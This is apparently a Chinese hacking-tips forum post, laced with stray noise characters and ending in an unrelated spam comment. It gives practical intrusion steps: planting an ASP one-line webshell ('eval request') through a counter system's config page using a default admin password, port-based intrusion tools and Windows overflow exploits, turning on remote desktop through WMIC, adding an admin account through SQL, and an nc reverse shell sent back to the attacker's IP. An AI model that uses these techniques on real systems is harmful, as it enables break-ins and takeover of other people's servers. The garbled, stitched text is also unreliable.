8 n8 c: }! H6 B$ d8 B统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: J, s1 z( O8 o; O查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 8 G: D% i9 e0 B9 U 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。 % {2 ?/ h2 j* T/ K8 w. u 0 _ N4 D. u3 l9 i3 g" L" ~4 N1 b; s' P. ]* W8 X
6 I: M' f8 n$ ^/ s7 U4 P% Q6 {! Q
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查) 6 O7 h! y6 f Q 3 S. _0 m8 V7 _7 h/ z. }- C9 g , h9 ~: Y$ k8 b0 c/ X+ m. f& S) f0 D. o # m: ]1 D/ v6 W; bCMD加密注册表位置 ; m2 ]+ K. y. U3 G(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor7 i& X' t* N4 T, J( p. Q: x$ C
AutoRun" H. B1 h' c# ?8 V& G
1 ]+ g+ q3 @1 _/ Y. M) {* x
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor; i0 w2 L& P$ }& Z/ }% Z( }
AutoRun 3 N* m3 x4 e& x$ O7 e- A ' _) @1 e: }! B: T , `+ X# C" y7 Y% q2 }. _5 A在找注入时搜索Hidden,把他改成test1 T- `; @/ E4 Z: ]
0 ~% H7 |5 v5 I) [
5 P% N* b) c8 I: N
1 v, c& z0 [* L5 b% k4 O# n! {mstsc /v:IP /console ( ? E, ^9 Q- ^9 B' ^5 m) B* P( ?; n6 B' S7 M
* p9 A, X; W0 h6 n" S7 y' {! _) _一句话开3389: 5 k& x2 ]4 s( g2 @; h! L. w3 B& u y
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> + d% q, H2 @& }8 Q! u+ ~5 k
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了. 8 I& p3 b2 h# ?4 _! S7 q* o- m3 B* Y6 R _
% R+ z4 N) Z# n, d0 B
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下: 4 I$ G) F0 R" |$ Y5 FInsert into admin(user,pwd) values('test','test')' y7 _* E4 E8 X' f- c' k
6 F' k5 d. Y9 o/ u0 N/ u& e
+ ^0 s& q5 l4 ^' B5 O" A. X
NC反弹! Y) T$ u/ _# |: t+ r$ n! }. c
先在本机执行: nc -vv -lp 监听的端口 (自己执行) + x; N& y# j o* ^) z' m* c8 h9 I然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行) 0 c5 h" G3 w% q" P! j) p 0 y9 b5 U' q* E% J* z( M: ^( J/ Z. m
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题, X- T4 R1 ^. e; O2 n: V, c
8 s3 z Y3 G# h( i* \有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录: i6 \! ^1 k' y. O9 S4 b
例如:* B9 o7 l5 K2 h
subst k: d:\www\ 用d盘www目录替代k盘 ' B. O8 B) ^" Hsubst k: /d 解除K盘代替作者: 匿名 时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta